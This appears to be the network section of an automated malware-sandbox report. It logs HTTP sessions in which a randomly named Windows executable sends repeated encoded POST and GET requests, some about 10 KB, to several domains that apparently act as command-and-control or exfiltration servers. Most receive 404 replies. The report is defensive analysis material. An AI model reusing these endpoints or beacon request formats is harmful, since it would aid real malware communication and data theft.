                                                          Jul 3, 2024 15:58:17.569860935 CEST | 461 | OUT | GET /8g7d/?TvpPfhGp=rWbbvp+cwrqQgazA9nOhlKpoIaKdpvX3NtKjwAvzyCJ08CtHZWjUKOIyI7s4v/dodflG0NuedqdGjOxv5Uk5GEd+1aRY1dG/6xJxc0ee/cBS07/9XhY/WVk=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.costmoon.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:18.095403910 CEST | 770 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Content-Length: 626
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:18 GMT
                                                          Server: Apache
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.4 | 49762 | 38.47.232.185 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:23.521548986 CEST | 717 | OUT | POST /axxb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.w25dn.top
                                                          Origin: http://www.w25dn.top
                                                          Referer: http://www.w25dn.top/axxb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=eqOC++hwOk4iQ9+Ku9gK0oQH/VvqlITgzGob1Ta2//tJR9YtixTSq/mdij/QsMa7vYECs6Nr2DjGV4KWx03HVItKKA677Xg83JIG5j896WenHIYJ55QeLbZ77qIfd5kuTpE9+AGlwR7wX0nFNNbjpFe5vCjplgSg84lsnuuf3DJBZtOYTV7/dnTe3plqB3CHwA==
                                                          Jul 3, 2024 15:58:24.427017927 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:58:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.4 | 49763 | 38.47.232.185 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:26.057864904 CEST | 737 | OUT | POST /axxb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.w25dn.top
                                                          Origin: http://www.w25dn.top
                                                          Referer: http://www.w25dn.top/axxb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=eqOC++hwOk4iWduKve4KxIQYz1vqqoT7zGkb1SemqdZJWZQtwgTSp/mdoD/fz8awvYIws6Br2HzGV6iWyHuRVYtMSw65/Xg83JIG5nQb6VunA7AJrIQdB7Z48qIfZ5llTpEP+BqDwX/wX1XFN8binFe7rCi5gCvcxrs6m8m92xVdYrfCCkaoPn3tquseM0/OrJAkmS8DEkctjOKVgydT89w=
                                                          Jul 3, 2024 15:58:26.956707954 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:58:26 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.4 | 49764 | 38.47.232.185 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:28.584786892 CEST | 10819 | OUT | POST /axxb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.w25dn.top
                                                          Origin: http://www.w25dn.top
                                                          Referer: http://www.w25dn.top/axxb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=eqOC++hwOk4iWduKve4KxIQYz1vqqoT7zGkb1SemqdhJWrItiTLSo/mdrD/cz8axvZg0s6dR2F7Ga5aW32uReYtMOA647XgT3JYa5ngb6VunA+MJoZQdSrZ77qITd5lNTpcl+BuMwnfwXVHFe+ji41e9mij8gCj5xoYAm9SH2zJdbqqPakX/TFfTpPA4DirAt4E6hgBaZ11Hhf+b2xBx/NHrM0pVoZVqhKJ8CcMiLW7dO5C+9a8YmgELFxOLGIko/w8ylKV6AMJw+FPXW49TA/DlkTEvVX6zSbNUkre88i4ZxmGtCGlkM8iEEl4+Pl3j8HfM++FSmmBPc/OH60AlYm9+ilsnAS22Hu+dOv/APfrgBtNUwAuJ/+hMwTkG2HFty+JfcgZbJl/hRBiyJ2k79069FwzfYYbvF1YIWuhnLBdwkkD2IV+QqV18O/sgGEJHL9XAfZaGwXp88/3ieTx192MQTHtHOBYqJ3Ca7xjIsz/bZy76s9Ugpcky55HJU2Jjin6lk9L/fS+1ydv74nn8utpsIp80vXNOik6BgOn/pqROrvycWBSfO7awISyh3ze99Pc06qWheRxfZYeW1gH+LMvS2hGT8i9f364Y8M4hsNxQmZ5tHDOnZcaTm0Id6xw3JwHigICtaRNaIIh6uMSk2+IvhmSm2sUD4EPVyaf/ycS/+lq8cUCNRkH5WQM0Sr7rxobsOLFBvyptXU7qnEfJaQJ/uYin14to9Q/ysdSY1rGVVmRYVBu6YU3zFlYkceHnDY9CPQQKaigx0H+4L21ZcWl9NavZF1gDh931DfGki29VC9u4+SQKFw2Y0ei1nwPLrDZ911QrJvFtMso4TWqzHZlxZVljJemGMPaQOJnAn6c7Gh2XFOjmR81Idmq1AEkt64z8b/mYOT3JiBsYImMZbn/XceLZMgdBB9ZFEWhlbxMiBJJDdjjnOORhzWxyxewcm9BmH9233jDbb+1TCSN9WlqRMRbP6JIeqpHI1687Nmh [TRUNCATED]
                                                          Jul 3, 2024 15:58:29.505669117 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:58:29 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.4 | 49765 | 38.47.232.185 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:31.116873026 CEST | 458 | OUT | GET /axxb/?TvpPfhGp=Tomi9JcGHwU5W62uuIED6rgr9HvHoI2i1WV2/yOG5tMyELYD9gbQrdSRvly679CAlYQP7KMM3mPFOKjE9n3WDNNFNlS8pk0/g6E2kBMo21yRC+YJoIsNK7I=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.w25dn.top
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:32.119332075 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:58:31 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.4 | 49766 | 46.30.211.38 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:45.299827099 CEST | 720 | OUT | POST /2gp2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.n-ambu.com
                                                          Origin: http://www.n-ambu.com
                                                          Referer: http://www.n-ambu.com/2gp2/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=V/VFhA6s6nVyRzmTIJD2RP6nlTXX6xFvBslZFkWWwF3M4DAS/JlKAAABlK9Zrsl/J/dHebTW6QBvYA86/hi358L5Gj88fbibalIHm3hS7lLFw4mPh+M1pq5sDK8CnnRARpnaGqD3YrvhBezptPkMBaohFn+zbJPmFMNn5hh3+OgPbUs/DMKnwVDQ9SHRLoMwLw==
                                                          Jul 3, 2024 15:58:46.290000916 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                          Jul 3, 2024 15:58:46.290860891 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.4 | 49767 | 46.30.211.38 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:47.837883949 CEST | 740 | OUT | POST /2gp2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.n-ambu.com
                                                          Origin: http://www.n-ambu.com
                                                          Referer: http://www.n-ambu.com/2gp2/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=V/VFhA6s6nVyTT2TbuX2A/6opzXXvBFrBs5ZFh2Gx3jM7hIS+N5KDAABtq9FmMl0J/Q6eb/W6RlvYBM68Qiw6ML7ND86ALibalIHm2F47lDFxL+PmvM0qq5rTq8CjnRERpn8GrPdYpXhBejpqekLPaovbX+nL4muPfgXzit+jNtjTy9lS9rwiVnjgVOlGrx5Q1+Bd2Sef4b/nbzggnGEpss=
                                                          Jul 3, 2024 15:58:48.459342003 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.4 | 49768 | 46.30.211.38 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:50.365294933 CEST | 10822 | OUT | POST /2gp2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.n-ambu.com
                                                          Origin: http://www.n-ambu.com
                                                          Referer: http://www.n-ambu.com/2gp2/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=V/VFhA6s6nVyTT2TbuX2A/6opzXXvBFrBs5ZFh2Gx3bM7TwS+s5KCAABnK9GmMlpJ782ebir6SNvZnQ65iGwtcL7Cj8/fbiCakkbm3147lDFxKOP1eM0lK5sDK8OnnRsRqXCGraoYafhC/Tprs8LHaotaX/gL46hPeNuzhxHjKljT3UcJPDn2mvrxn21L704QnulXD25c532laCExiOH6LWpkVuS2CvRuQeax5RxHHta4xyE3xJLgHMgxeRArp06jQvzE2xmiBxM1DZFuRxSYyVoyfUuYpGpj3V++m92XH4UQ8b4CSM7fLRziV0s3+LMBPHZz+dxzUwEOD1Ll3DAin1bxguLEPrNXaN8rP7krUqHDYRb6r2L8pwf/WMO2AaOeLAu7GcABIENDZYFi9haGg7dNKjPbkDehCL2306/kvNRlURd5zVW7q+8Nev88ytWNejZ4fDS96Gtz4/pBLRAwtS9glNRTZCUl21IfZgaPD5NvqgVF8v5SS+hJGAEwZgBpCPlZxa1xKdXAKpUoLXhjgZQahB0AoiJkW1JOxJ54HU5A2vWQU69/OfS4V5BUW55zcWEPoXr2+w9hU3U1inQ+Yj68Mgn6jN2JrZtHxMa23aL01J5+fksNJ8nR3EW0oOf0JVM+A6H+ATv4fWnvD4lhLDatSFDp4McwJ1fY/qTD2QoEvLSArwpQRxUKvbfwWcW6VsjnHx277Zw0irehL57ZeqSpQCXRTl7f8/LtGW+OYg78AY56dUiZgYpKW13ujrfIWw0bGxJkPGyKtAVQ9H6b2XUgydu6RiFbLUwb2P8yWyw4ux9oqP/roVJYnwPAikaNgqoHk9mWG7Sg9I9YoB/PTAn8IFm7EmxvT03k4yGfqDjO37A89dDNvkFhpD3myay61lvPqWMXvs6btTfW502+Z8BEXpT64lmXLZjcTH4E43ZlBcrANb/+MJhDm7pqJW2LTmuo98htAbl5fxw0Af3mhNl1QcjcqX/6FWoNyOHmCB [TRUNCATED]
                                                          Jul 3, 2024 15:58:50.988629103 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.4 | 49769 | 46.30.211.38 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:52.894948006 CEST | 459 | OUT | GET /2gp2/?TvpPfhGp=Y99li2SS0jFkeE2dW5fsIsqznCbyzAVNDcc+JEah7Ezrvxte8MpPDgExvKgilbZfLMJ3frvQmAcJOgkNzzn64tqjGSAfcd+mGzUUslxnkGXz4OyUxuBjmso=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.n-ambu.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:53.517133951 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.4 | 49770 | 217.160.0.119 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:58:58.567640066 CEST | 735 | OUT | POST /ndwb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.qrdinamicos.com
                                                          Origin: http://www.qrdinamicos.com
                                                          Referer: http://www.qrdinamicos.com/ndwb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=yoay6bQvRe8YPQCVmxhykaDRgm2Gq4q322wERe4RiWyG8IVVGtzpeaI3jP4fl2CvVM7DVWR8GRRgsBtuVK/QhJ2bkd0G4A1KGVB6IWQWW13mJi7Yya/PWbQnlThS2RcF+2LvPqJcQrpXwUpTirQvBqlV7igIfdCC4hS2NILxwahjxlxHpxeKnQ2hIuVlXkot/A==
                                                          Jul 3, 2024 15:58:59.248886108 CEST | 572 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:59 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.4 | 49771 | 217.160.0.119 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:01.099225998 CEST | 755 | OUT | POST /ndwb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.qrdinamicos.com
                                                          Origin: http://www.qrdinamicos.com
                                                          Referer: http://www.qrdinamicos.com/ndwb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 79 6f 61 79 36 62 51 76 52 65 38 59 4a 78 53 56 6b 57 56 79 73 61 44 65 73 47 32 47 67 59 71 7a 32 32 30 45 52 66 38 42 69 67 69 47 38 73 52 56 48 6f 48 70 62 61 49 33 6f 76 34 65 71 57 43 65 56 4d 2f 39 56 55 46 38 47 52 31 67 73 41 64 75 56 62 2f 66 37 35 32 5a 69 64 30 45 38 41 31 4b 47 56 42 36 49 57 46 7a 57 31 66 6d 49 53 4c 59 79 2b 54 4f 61 37 51 6d 67 6a 68 53 6e 42 64 4f 2b 32 4c 42 50 72 56 32 51 74 31 58 77 52 56 54 69 36 52 35 4b 71 6c 54 2f 69 67 62 52 73 66 74 38 44 44 67 4b 75 6a 79 35 2b 78 48 30 6a 67 64 34 41 2f 64 31 51 53 53 56 70 63 52 61 6e 56 6b 6b 4e 69 33 4d 2f 37 70 6f 30 36 52 6a 51 35 32 35 66 61 72 46 47 49 3d
                                                          Data Ascii: TvpPfhGp=yoay6bQvRe8YJxSVkWVysaDesG2GgYqz220ERf8BigiG8sRVHoHpbaI3ov4eqWCeVM/9VUF8GR1gsAduVb/f752Zid0E8A1KGVB6IWFzW1fmISLYy+TOa7QmgjhSnBdO+2LBPrV2Qt1XwRVTi6R5KqlT/igbRsft8DDgKujy5+xH0jgd4A/d1QSSVpcRanVkkNi3M/7po06RjQ525farFGI=
                                                          Timestamp: Jul 3, 2024 15:59:01.764475107 CEST | Bytes transferred: 572 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:59:01 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip
                                                          Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                                          Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                                          Session ID: 35 | Source IP: 192.168.2.4 | Source Port: 49772 | Destination IP: 217.160.0.119 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp: Jul 3, 2024 15:59:03.631957054 CEST | Bytes transferred: 10837 | Direction: OUT | Data:
                                                          POST /ndwb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.qrdinamicos.com
                                                          Origin: http://www.qrdinamicos.com
                                                          Referer: http://www.qrdinamicos.com/ndwb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 79 6f 61 79 36 62 51 76 52 65 38 59 4a 78 53 56 6b 57 56 79 73 61 44 65 73 47 32 47 67 59 71 7a 32 32 30 45 52 66 38 42 69 67 71 47 38 66 4a 56 47 50 62 70 63 61 49 33 32 66 34 62 71 57 43 48 56 4d 48 68 56 55 49 48 47 58 78 67 71 6d 42 75 43 66 72 66 75 70 32 5a 76 39 30 42 34 41 30 65 47 56 52 2b 49 57 56 7a 57 31 66 6d 49 51 54 59 37 4b 2f 4f 63 37 51 6e 6c 54 68 4f 32 52 64 6d 2b 32 6a 33 50 6f 35 4d 51 65 74 58 7a 78 6c 54 76 6f 35 35 48 71 6c 52 34 69 68 47 52 73 54 79 38 44 50 61 4b 71 71 58 35 35 42 48 31 45 41 41 71 53 76 6b 6a 67 53 4e 50 75 67 4b 55 31 4e 57 71 65 58 4f 61 71 6d 39 34 6b 75 65 6f 7a 41 49 74 66 7a 70 63 52 67 33 45 4f 71 74 57 76 64 36 54 54 48 36 63 59 49 45 33 54 45 53 67 6a 48 57 51 70 67 6e 73 32 64 4e 63 4f 5a 5a 5a 6a 53 2b 65 54 32 48 54 6a 76 31 65 79 47 71 4b 64 7a 4d 4c 49 42 68 64 63 47 76 72 73 37 37 74 6b 46 72 66 48 34 65 6a 53 39 2b 33 70 66 67 45 71 69 74 7a 36 62 50 56 6d 4f 51 79 59 59 31 6c 6d 4e 77 32 71 47 71 33 75 6f 4f 77 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=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 [TRUNCATED]
                                                          Timestamp: Jul 3, 2024 15:59:04.285289049 CEST | Bytes transferred: 572 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
